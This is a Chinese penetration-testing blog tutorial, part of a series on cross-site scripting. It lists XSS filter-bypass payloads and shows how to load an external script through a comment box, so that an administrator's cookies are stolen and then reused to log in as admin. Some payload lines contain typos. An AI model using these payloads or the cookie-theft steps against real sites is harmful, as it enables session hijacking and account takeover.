XSS的原理分析与解剖(3)

CracerCracer 2016-3-25 渗透测试 582 0 2

xss是一门又热门又不太受重视的Web攻击手法,为什么会这样呢,原因有下:耗时间、有一定几率不成功、没有相应的软件来完成自动化攻击、是一种被动的攻击手法等。

0×04 过滤的解决办法

假如说网站禁止过滤了script 这时该怎么办呢,记住一句话,这是我总结出来的“xss就是在页面执行你想要的js”不用管那么多,只要能运行我们的js就OK,比如用img标签或者a标签。我们可以这样写

  1. <img scr=1 onerror=alert('xss')>当找不到图片名为1的文件时,执行alert('xss')  
  2. <a href=javascrip:alert('xss')>s</a> 点击s时运行alert('xss')  
  3. <iframe src=javascript:alert('xss');height=0 width=0 /><iframe>利用iframe的scr来弹窗  
  4. <img src="1" onerror=eval("\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29")></img>过滤了alert来执行弹窗   

等等有很多的方法,不要把思想总局限于一种上面,记住一句话“xss就是在页面执行你想要的js”其他的管他去。(当然有的时候还有管他…)

0×05 xss的利用

说了那么多,大家可能都以为xss就是弹窗,其实错了,弹窗只是测试xss的存在性和使用性。

这时我们要插入js代码了,怎么插呢?

你可以这样

  1. <script scr="js_url"></script> 

也可以这样

  1. <img src=x onerror=appendChild(createElement('script')).src='js_url' /> 

各种姿势,各种插,只要鞥运行我们的js就OK。那运行我们的js有什么用呢?

Js可以干很多的事,可以获取cookies(对http-only没用)、控制用户的动作(发帖、私信什么的)等等。

比如我们在网站的留言区输入下面的代码:

  1. <script scr="js_url"></script> 

当管理员进后台浏览留言的时候,就会触发,然后管理员的cookies和后台地址还有管理员浏览器版本等等你都可以获取到了,再用“桂林老兵cookie欺骗工具”来更改你的cookies,就可以不用输入账号 密码 验证码 就可以以管理员的方式来进行登录了。

至于不会js的怎么写js代码呢,放心网上有很多xss平台,百度一下就可以看到了。页面是傻瓜式的操作,这里就不再过多的说明了。

 

 

转载请注明来自Cracer,本文标题:《XSS的原理分析与解剖(3)》

喜欢 (2) 发布评论
发表评论


Top